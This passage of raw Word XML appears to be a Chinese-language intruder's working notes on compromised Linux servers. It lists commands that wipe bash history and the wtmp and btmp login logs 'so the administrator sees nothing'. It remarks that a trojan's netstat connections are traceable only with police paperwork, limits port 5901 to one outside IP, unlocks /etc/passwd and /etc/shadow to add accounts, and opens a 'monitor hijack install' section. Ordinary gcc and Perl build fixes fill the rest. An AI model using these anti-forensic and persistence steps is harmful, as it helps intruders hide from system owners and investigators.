          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清理记录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; ~/.bash_history </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>echo &gt;/var/log/wtmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>echo &gt;/var/log/btmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>history -c #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录敲键盘的文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干完该干的事情，依次运行以上，保证管理员看不到任何信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netstat -an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的小马连接，还有路由器访问记录，一般没公安文件是查不到的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00F66F81" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置只有指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能访问某端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>iptables -I INPUT -s 61.147.103.120 -p tcp --dport 5901 -j ACCEPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">iptables -A INPUT -p tcp --dport 5901 -j DROP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示打不开这个那个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="562" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>今天在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redhat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加一用户，一直提示：“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>useradd: error opening shadow group file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>chattr -i /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>chattr -i /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>chattr -i /etc/group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>chattr -i /etc/gshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00A059B2" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00A059B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>configure: error: C compiler cannot create executables</w:t>
      </w:r>
      <w:r w:rsidRPr="00A059B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误解决</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>checking build system type... i686-pc-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>checking host system type... i686-pc-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>checking for gcc... gcc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>checking for C compiler default output file name...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>configure: error: C compiler cannot create executables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00791B7E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B7E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>See `config.log' for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有很多人建议重装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是确无济于事。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个错误产生的原因其实很简单：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于我们在编译软件之前，进行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，改变了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CFLAGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LIBS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个时候只要讲这个值清空就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="982" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>export LIBS=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="1082" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>export CFLAGS=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
        <w:t>yum -y install gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
        <w:t xml:space="preserve">  centos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F3FA"/>
        </w:rPr>
        <w:t>perl5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl5.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装及其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2013-02-20 17:21:29)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> perl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cpan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>RHEL5.4 Linux 2.6.18-164.el5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl5.10.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装包：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>perl-5.10.0.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。或用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wget http://www.cpan.org/src/perl-5.10.0.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上直接下载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压安装包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># tar -xzvf perl-5.10.0.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl5.10.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># cd perl-5.10.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置安装目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># ./Configure -des -Dprefix=/usr/local/perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># make test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># make install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换原有安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># mv /usr/bin/perl /usr/bin/perl.bak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># ln -s /usr/local/perl/bin/perl /usr/bin/perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># perl -v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t># perl -MCPAN -e shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压安装包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>cpan[1]&gt; install DBI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>cpan[2]&gt; install DBD::Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找不到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="004700F6" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auth_password.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
